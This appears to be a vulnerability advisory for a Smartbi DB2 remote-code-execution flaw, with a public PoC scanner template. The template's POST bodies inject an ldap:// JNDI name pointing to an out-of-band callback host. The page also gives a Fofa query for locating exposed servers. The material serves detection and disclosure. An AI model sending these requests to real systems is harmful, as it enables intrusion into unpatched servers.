smartbi-db2-biconfigservice-rce: Smartbi DB2 RCE

日期: 2025-09-01 | 影响软件: Smartbi DB2 | POC: 已公开

漏洞描述

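Smartbi 低于 v10.5.8(20221125) 的版本存在 DB2 命令执行漏洞(此前版本即使已安装 patch.2022-11-22 补丁也仍受影响)。补丁信息见厂商页面:https://www.smartbi.com.cn/patchinfo

Fofa: app="SMARTBI"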

PoC代码[已公开]

# Scanner template that checks whether a Smartbi instance still accepts a
# DB2 "testConnection" request carrying a clientRerouteServerListJNDIName
# property, and whether that request makes the server resolve an external name.
# Defender view: the same two signals are what to monitor for --
#   * POSTs to */vision/RMIServlet with className=BIConfigService,
#     methodName=testConnection and clientRerouteServerListJNDIName in params;
#   * DNS/LDAP egress from the BI server to hosts it has no reason to contact.
id: smartbi-db2-biconfigservice-rce

info:
  name: Smartbi DB2 RCE
  author: xpoc
  severity: critical
  verified: true
  # NOTE(review): this field holds only an asset-search query, not a
  # description of the flaw; the affected-version statement is in `solutions`.
  description: |
    Fofa: app="SMARTBI"
  # English: Smartbi versions earlier than v10.5.8 (20221125) are affected by a
  # DB2 command-execution flaw; per this note, earlier versions remain affected
  # even with patch.2022-11-22 applied.
  # NOTE(review): despite the key name, the text states the affected range, not
  # a fix. The implied remediation is v10.5.8 (20221125) or later -- confirm
  # against the vendor patch page listed under `reference`.
  solutions: smartbi 小于v10.5.8(20221125)版本(之前版本打patch.2022-11-22补丁也不行)存在db2命令执行漏洞
  reference:
    - https://www.smartbi.com.cn/patchinfo
  tags: smartbi,rce
  created: 2023/06/22

set:
  # Out-of-band callback handle provided by the scanning engine
  # (builtin; its exact semantics are not shown in this file).
  oob: oob()
  # DNS name tied to that handle; substituted for {{oobDNS}} in r2 and r4.
  oobDNS: oob.DNS
rules:
  # r1/r2 target the /smartbi context path; r3/r4 repeat the same pair of
  # checks for deployments served from the root context.
  r1:
    # Reachability probe: calls BIConfigService.testConnection with a DB2_V9
    # connection definition whose clientRerouteServerListJNDIName value is empty.
    request:
      method: POST
      path: /smartbi/vision/RMIServlet
      body: className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688",":clientRerouteServerListJNDIName=","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]
    # Matches when the reply is HTTP 200, contains "stackTrace", and contains
    # neither "CLIENT_USER_NOT_LOGIN" nor the Chinese phrase (roughly: "would
    # introduce an RCE security vulnerability").
    # NOTE(review): presumably the first exclusion is the login-required reply
    # and the second is the rejection message of fixed builds -- confirm.
    expression: response.status == 200 && response.body.ibcontains(bytes("stackTrace")) && !response.body.ibcontains(bytes("CLIENT_USER_NOT_LOGIN")) && !response.body.ibcontains(bytes("会存在RCE的安全漏洞"))
  r2:
    # Same call, but the JNDI name is an ldap:// URL whose host is the
    # engine's callback name; nothing is read from the HTTP response.
    request:
      method: POST
      path: /smartbi/vision/RMIServlet
      body: className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688","BLUDB:clientRerouteServerListJNDIName=ldap://{{oobDNS}}","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]
    # Matches only if the engine observes a DNS interaction for the callback
    # name. NOTE(review): the trailing 3 is presumably a wait/timeout value --
    # confirm against the engine documentation.
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
  r3:
    # Root-context variant of r1 (identical body and match expression).
    request:
      method: POST
      path: /vision/RMIServlet
      body: className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688",":clientRerouteServerListJNDIName=","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]
    expression: response.status == 200 && response.body.ibcontains(bytes("stackTrace")) && !response.body.ibcontains(bytes("CLIENT_USER_NOT_LOGIN")) && !response.body.ibcontains(bytes("会存在RCE的安全漏洞"))
  r4:
    # Root-context variant of r2 (identical body and match expression).
    request:
      method: POST
      path: /vision/RMIServlet
      body: className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688","BLUDB:clientRerouteServerListJNDIName=ldap://{{oobDNS}}","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
# A target is reported only when both the probe and the callback check
# succeed on the same context path; the probe alone is not treated as a finding.
expression: (r1() && r2()) || (r3() && r4())
